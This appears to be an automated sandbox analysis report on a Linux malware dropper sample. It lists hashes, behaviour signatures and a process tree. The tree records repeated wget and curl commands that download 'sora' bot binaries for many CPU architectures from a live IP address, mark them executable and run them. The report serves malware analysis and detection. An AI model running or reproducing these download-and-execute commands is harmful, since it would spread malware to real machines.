Analysis
-
max time kernel
16s -
max time network
16s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28-03-2024 10:06
Static task
static1
Behavioral task
behavioral1
Sample
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Resource
ubuntu1804-amd64-20240226-en
Behavioral task
behavioral2
Sample
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Resource
debian9-mipsbe-20240226-en
Behavioral task
behavioral4
Sample
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
-
Size
1KB
-
MD5
02ca1bec2de42845c35867af0dc72be3
-
SHA1
d2fc439476dd4ec34fce01257762a34b0aa6f3d5
-
SHA256
848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54
-
SHA512
302e57020da9a74ee02c1f39c81aacb5a4385cedb7a0323ee3ba208d8e58fe5abdf83e2975bc8416ba684e164a512420b550f15569f3243f39a00d4cd99a3dc7
Malware Config
Signatures
-
Executes dropped EXE 10 IoCs
Processes:
robbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenioc pid process /tmp/robben 736 robben /tmp/robben 748 robben /tmp/robben 754 robben /tmp/robben 760 robben /tmp/robben 766 robben /tmp/robben 779 robben /tmp/robben 797 robben /tmp/robben 816 robben /tmp/robben 835 robben /tmp/robben 841 robben -
Reads runtime system information 10 IoCs
Reads data from /proc virtual filesystem.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description ioc File opened for modification /tmp/robben
Processes
-
/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes1181⤵
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.x862⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.x862⤵
- Reads runtime system information
-
/bin/catcat sora.x862⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.mips2⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.mips2⤵
- Reads runtime system information
-
/bin/catcat sora.mips2⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.mpsl2⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.mpsl2⤵
- Reads runtime system information
-
/bin/catcat sora.mpsl2⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.arm42⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.arm42⤵
- Reads runtime system information
-
/bin/catcat sora.arm42⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.arm52⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.arm52⤵
- Reads runtime system information
-
/bin/catcat sora.arm52⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.arm62⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.arm62⤵
- Reads runtime system information
-
/bin/catcat sora.arm62⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.arm72⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.arm72⤵
- Reads runtime system information
-
/bin/catcat sora.arm72⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.ppc2⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.ppc2⤵
- Reads runtime system information
-
/bin/catcat sora.ppc2⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.m68k2⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.m68k2⤵
- Reads runtime system information
-
/bin/catcat sora.m68k2⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.sh42⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.sh42⤵
- Reads runtime system information
-
/bin/catcat sora.sh42⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE